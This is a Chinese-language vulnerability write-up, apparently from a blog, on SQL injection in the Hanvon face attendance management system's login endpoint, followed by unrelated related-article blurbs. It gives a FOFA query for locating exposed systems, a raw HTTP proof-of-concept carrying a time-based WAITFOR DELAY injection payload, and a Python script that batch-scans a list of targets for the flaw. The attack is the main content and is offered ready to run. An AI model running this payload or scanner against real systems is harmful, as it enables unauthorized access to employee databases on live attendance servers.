汉王人脸考勤管理系统

简介: 汉王人脸考勤管理系统

漏洞简介


 汉王考勤管理系统简化版是是汉王人脸通考勤机的配套软件,满足客户的日常基本使用需要。汉王考勤管理系统第一次使用,需要完成一些例如服务器设置、员工信息、考勤规则、单位班次及员工排班等基本设置。该软件存在SQL注入,可获取数据库敏感信息。


FOFA语句


"汉王人脸考勤管理系统"


影响范围

汉王人脸考勤管理系统


漏洞复现


在登录框处抓包验证


poc


POST /Login/Check HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 50
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb
Connection: close
strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd


如果返回ok,说明存在SQL注入

640.png

python脚本


import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
def lemonlove7():
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file x.txt')
    print('FOFA:"汉王人脸考勤管理系统"')
    print('lemonlove7')
if len(sys.argv)==1:
    lemonlove7()
    sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()
url = a.url
file = a.file
headers= {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Cookie':'ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb'
}
data="strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd"
if url != '':
    furl = url
    try:
        url =furl+'/Login/Check/'
        r= requests.post(url=url,headers=headers,data=data,timeout=10,verify=False)
        if r.status_code == 200 and 'ok' in r.text:
            print(furl+'存在sql注入')
        else:
            print(furl+'不存在sql注入')
    except Exception as e:
        print(furl+'不存在sql注入')
if file !='':
    text =file
    f = open(text,'r+')
    for i in f.readlines():
        url = i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url1 = url
        url2=url
        try:
            url1 = url+'/Login/Check/'
            r =requests.post(url=url1,headers=headers,data=data,timeout = 10,verify=False)
            if r.status_code==200 and 'ok' in r.text:
                print(url2+'存在sql注入')
            else:
                print(url2+'不存在sql注入')
        except Exception as e:
            print(url2+'不存在sql注入')


运行效果如下:

640.png




相关文章
|
应用服务中间件 Linux nginx
centos离线安装nginx详细教程
centos离线安装nginx详细教程
2230 0
|
4月前
|
存储 负载均衡 机器人
Nimbus:一个统一的具身合成数据生成框架
Nimbus是一个统一的合成数据生成框架,专为具身智能设计。它通过模块化四层架构,解耦轨迹规划、渲染与存储,实现动态流水线调度、全局负载均衡和分布式容错,显著提升CPU/GPU/I/O资源利用率。相比基线,端到端吞吐量提升2–3倍,支撑InternData系列大规模数据集稳定生成。(239字)
349 4
|
12月前
|
人工智能 运维 API
Dify开发者必看:如何破解MCP集成与Prompt迭代难题?
Dify 是一个面向AI时代的开源大语言模型(LLM)应用开发平台,致力于让复杂的人工智能应用构建变得简单高效,目前已在全球范围内形成显著影响力,其 GitHub 仓库 Star 数截至 2025 年 6 月已突破 100,000+,目前,Dify 已经成为 LLMOps 领域增长最快的开源项目之一。
|
8月前
|
Dubbo Java 测试技术
【Lattice】设计原理
Lattice 是一个轻量级业务扩展调用框架,通过模块化架构实现复杂业务定制的高效管理。支持动态发现、加载与执行扩展,提供清晰的分层设计,集成 Spring、Dubbo 等主流技术,助力企业应用灵活扩展。
772 0
|
XML 安全 Apache
利用EXCEL进行XXE攻击
本文介绍了通过构造恶意 Excel 文件利用 XXE(XML 外部实体)漏洞的原理与实践。首先说明了文件如 Word、Excel 等以 ZIP 格式存储,包含多个 XML 文件的特点。当服务器未正确配置 XML 解析器时,可能导致文件泄露、远程代码执行或拒绝服务攻击等风险。接着详细描述了搭建测试环境的过程,包括使用 Apache POI 依赖读取 Excel 文件,修改 xlsx 文件中的 Content_Types.xml 添加外部实体引用,以及通过 DNSLog 验证漏洞存在。最后展示了如何利用外部 DTD 文件读取目标系统上的敏感文件,并将数据写入指定位置,完成攻击验证。
1409 5
利用EXCEL进行XXE攻击
|
编解码 Linux API
从FFplay到自定义播放器:构建高性能多媒体应用程序的进阶之路
【10月更文挑战第15天】多媒体应用程序的开发是一个复杂的过程,尤其是在追求高性能和定制化体验时。本文将引导你从使用FFplay作为起点,逐步过渡到构建一个完全自定义的播放器。我们将探讨FFmpeg库的高级用法、多媒体同步原理、跨平台开发注意事项,以及如何实现用户界面与音视频解码的无缝集成。
632 1
|
前端开发 JavaScript 数据安全/隐私保护
优雅实现管理后台403页面:技术细节与实践案例
在管理后台开发中,403页面是一个不可忽视的组成部分。它不仅关系到用户体验,还涉及到系统的安全性。本文将分享如何在管理后台中优雅地实现403页面,以及几个具体的实践案例。
580 2
|
搜索推荐 数据安全/隐私保护 UED
管理后台403页面的优雅实现策略
在管理后台的开发中,403页面是一个不可忽视的存在。它不仅关系到用户体验,还涉及到系统的安全性和专业性。一个优雅实现的403页面,能够在用户无权访问某个资源时提供清晰的反馈,同时保持管理后台的整洁和一致性。以下是几个关键步骤和技术分享,帮助你实现一个既优雅又有效的403页面。
370 2
|
Java Windows
解决IDEA .properties文件中文乱码的问题
解决IDEA .properties文件中文乱码的问题
5316 0
解决IDEA .properties文件中文乱码的问题
|
Go API 开发工具
我的业务不一样,用 go-zero 怎么搞?
我的业务不一样,用 go-zero 怎么搞?